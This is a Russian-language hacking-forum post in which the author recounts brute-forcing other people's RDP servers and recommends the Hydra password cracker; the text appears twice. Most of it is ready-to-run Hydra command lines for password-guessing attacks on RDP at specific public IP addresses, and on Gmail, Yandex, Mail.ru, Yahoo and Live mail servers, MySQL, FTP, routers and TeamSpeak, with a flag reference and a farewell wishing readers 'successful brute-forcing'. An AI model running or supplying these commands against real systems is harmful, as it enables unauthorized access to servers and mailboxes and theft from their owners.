SUPPORT_388945a0
Участник
SUPPORT_388945a0
Участник
- 6 Фев 2016
- 49
- 10
Сегодня результатами проверки моих DUBrut-ов на дедиках явились, как обычно, две новости: одна хорошая и одна плохая.
Начинаю с хорошей. В моих гудах были несколько дедов. В последнее время я перестал испытывать чувство радости, увидев ещё одну строчку в файле good.txt. Всё по той причине, что в этих строчках всё чаще попадаются невалидные дедики. Ну или какая-нибудь другая напасть.
Но не в этот раз. Как обычно, я создал файл подключения ***.rdp, дважды кликнул по нему, и О, ЧУДО. Через мгновение на экране своего монитора был чей-то чужой рабочий стол. Замерив скорость соединения, я совсем уж было начал ликовать.
Но хорошие новости хороши лишь в том случае, если после них не приходят плохие. А у меня всё по обычному сценарию.
После заливки софта на дедик, я с огорчением обнаружил, что PPS-ки равны нулю. Ну ни одна напасть, так другая.
И тут совершенно случайно я вспомнил про Гидру.
Да ещё и случай помог. Как раз в интернете я нашел ещё две, помимо выложенных ранее, версии hydra for windows. Скомпилированные и готовые к употреблению.
Не буду долго ходить вокруг да около, вот ссылки на скачивание.
Естественно, я не удержался, чтобы не попробовать программу в деле.
В результате своих проб, я пришёл к выводу, что в операционной системе Windows текстовые файлы логинов и паролей лучше сохранять в кодировке ANSI.
Примеры команд, которыми я успешно тестировал программу с целью брута дедиков по протоколу RDP, порт 3389.
hydra -s 3389 -t 4 -V -l administrator -P pass.txt -o good.txt rdp://194.0.144.71
hydra -s 3389 -t 1 -V -L login.txt -P pass.txt -o good.txt rdp://77.239.230.46
hydra -s 3389 -t 1 -V -L login.txt -P pass.txt -o good.txt -M IP.txt rdp
Ключи:
-s - PORT
-R - восстановление программы после сбоя
-P (-p) имя файла (пароль) - использовать пароли из файла (или заданный пароль)
-L (-l) имя файла (логин) - аналогично, берем логины из списка или заданный
-C file_name - пары логин:пароль, вместо отдельного списка логинов и отдельно списка паролей
-t n -количество потоков (n от 0 до 255).
-o файл - вывод информации о работе в файл
-f - завершение работы после нахождения первой пары логин - пас
Но "Гидра" может применяться не только для брута дедиков.
Ешё примеры ввода команд:
* Взлом почты: hydra -L logins.txt -P passwords.txt -o log.txt -t 255 pop.site.com pop3
* Взлом mysql: hydra -L logins.txt -P passwords.txt -o log.txt -t 100 sql.site.ru mysql
* Взлом ftp: hydra -L logins.txt -P passwords.txt -o log.txt -t 255 ftp.site.net ftp
* Взлом ftp: hydra -L C:\Hydra\login_1.txt -P C:\Hydra\pass_0.2.txt -o Results.txt 127.0.0.1 ftp
* Ещё взлом ftp: hydra.exe -L login.txt -P pass.txt -f -o results.txt -s [IP-ADRESS/HostName.Com] ftp
* Взлом icq: hydra -L login.txt -P pass.txt -o log.txt -t 255 login.oscar.aol.com icq
* Взлом рутера: hydra.exe -L login.txt -P pw1.txt -f -o results.txt -e ns -vV [IP-ADRESS] http-get /
* Взлом teamspeak: hydra.exe -L login.txt -P pass.txt -f -o results.txt -s [PORT] -v [IP-ADRESS] teamspeak
Вот ещё несколько команд для брута на мейлы:
@gmail.com
@aol.com
@yandex.ru
@mail.ru/list/inbox/bk
@yahoo.com
@live.com
hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 -t 3 pop.gmail.com pop3 - работа в 3 потока
hydra.exe -C 1.txt -o results.txt -vV pop.mail.ru pop3
hydra.exe -C 1.txt -o results.txt -vV pop3.yandex.ru pop3
hydra.exe -C 1.txt -o results.txt -vV imap.aol.com imap
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 pop.gmail.com pop3
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 -t 3 pop.gmail.com pop3 - работа в 3 потока
hydra.exe -C 1.txt -o results.txt -vV pop.mail.yahoo.com pop3
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 -t 10 pop3.live.com pop3
Но на тех дедиках я её так и не попробовал. Не верю в "работоспособность" дедиков.
Удачного вам брута.
Начинаю с хорошей. В моих гудах были несколько дедов. В последнее время я перестал испытывать чувство радости, увидев ещё одну строчку в файле good.txt. Всё по той причине, что в этих строчках всё чаще попадаются невалидные дедики. Ну или какая-нибудь другая напасть.
Но не в этот раз. Как обычно, я создал файл подключения ***.rdp, дважды кликнул по нему, и О, ЧУДО. Через мгновение на экране своего монитора был чей-то чужой рабочий стол. Замерив скорость соединения, я совсем уж было начал ликовать.
Но хорошие новости хороши лишь в том случае, если после них не приходят плохие. А у меня всё по обычному сценарию.
После заливки софта на дедик, я с огорчением обнаружил, что PPS-ки равны нулю. Ну ни одна напасть, так другая.
И тут совершенно случайно я вспомнил про Гидру.
Да ещё и случай помог. Как раз в интернете я нашел ещё две, помимо выложенных ранее, версии hydra for windows. Скомпилированные и готовые к употреблению.
Не буду долго ходить вокруг да около, вот ссылки на скачивание.
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Естественно, я не удержался, чтобы не попробовать программу в деле.
В результате своих проб, я пришёл к выводу, что в операционной системе Windows текстовые файлы логинов и паролей лучше сохранять в кодировке ANSI.
Примеры команд, которыми я успешно тестировал программу с целью брута дедиков по протоколу RDP, порт 3389.
hydra -s 3389 -t 4 -V -l administrator -P pass.txt -o good.txt rdp://194.0.144.71
hydra -s 3389 -t 1 -V -L login.txt -P pass.txt -o good.txt rdp://77.239.230.46
hydra -s 3389 -t 1 -V -L login.txt -P pass.txt -o good.txt -M IP.txt rdp
Ключи:
-s - PORT
-R - восстановление программы после сбоя
-P (-p) имя файла (пароль) - использовать пароли из файла (или заданный пароль)
-L (-l) имя файла (логин) - аналогично, берем логины из списка или заданный
-C file_name - пары логин:пароль, вместо отдельного списка логинов и отдельно списка паролей
-t n -количество потоков (n от 0 до 255).
-o файл - вывод информации о работе в файл
-f - завершение работы после нахождения первой пары логин - пас
Но "Гидра" может применяться не только для брута дедиков.
Ешё примеры ввода команд:
* Взлом почты: hydra -L logins.txt -P passwords.txt -o log.txt -t 255 pop.site.com pop3
* Взлом mysql: hydra -L logins.txt -P passwords.txt -o log.txt -t 100 sql.site.ru mysql
* Взлом ftp: hydra -L logins.txt -P passwords.txt -o log.txt -t 255 ftp.site.net ftp
* Взлом ftp: hydra -L C:\Hydra\login_1.txt -P C:\Hydra\pass_0.2.txt -o Results.txt 127.0.0.1 ftp
* Ещё взлом ftp: hydra.exe -L login.txt -P pass.txt -f -o results.txt -s [IP-ADRESS/HostName.Com] ftp
* Взлом icq: hydra -L login.txt -P pass.txt -o log.txt -t 255 login.oscar.aol.com icq
* Взлом рутера: hydra.exe -L login.txt -P pw1.txt -f -o results.txt -e ns -vV [IP-ADRESS] http-get /
* Взлом teamspeak: hydra.exe -L login.txt -P pass.txt -f -o results.txt -s [PORT] -v [IP-ADRESS] teamspeak
Вот ещё несколько команд для брута на мейлы:
@gmail.com
@aol.com
@yandex.ru
@mail.ru/list/inbox/bk
@yahoo.com
@live.com
hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 -t 3 pop.gmail.com pop3 - работа в 3 потока
hydra.exe -C 1.txt -o results.txt -vV pop.mail.ru pop3
hydra.exe -C 1.txt -o results.txt -vV pop3.yandex.ru pop3
hydra.exe -C 1.txt -o results.txt -vV imap.aol.com imap
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 pop.gmail.com pop3
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 -t 3 pop.gmail.com pop3 - работа в 3 потока
hydra.exe -C 1.txt -o results.txt -vV pop.mail.yahoo.com pop3
hydra.exe -C 1.txt -o results.txt -vV -S -s 995 -t 10 pop3.live.com pop3
Но на тех дедиках я её так и не попробовал. Не верю в "работоспособность" дедиков.
Удачного вам брута.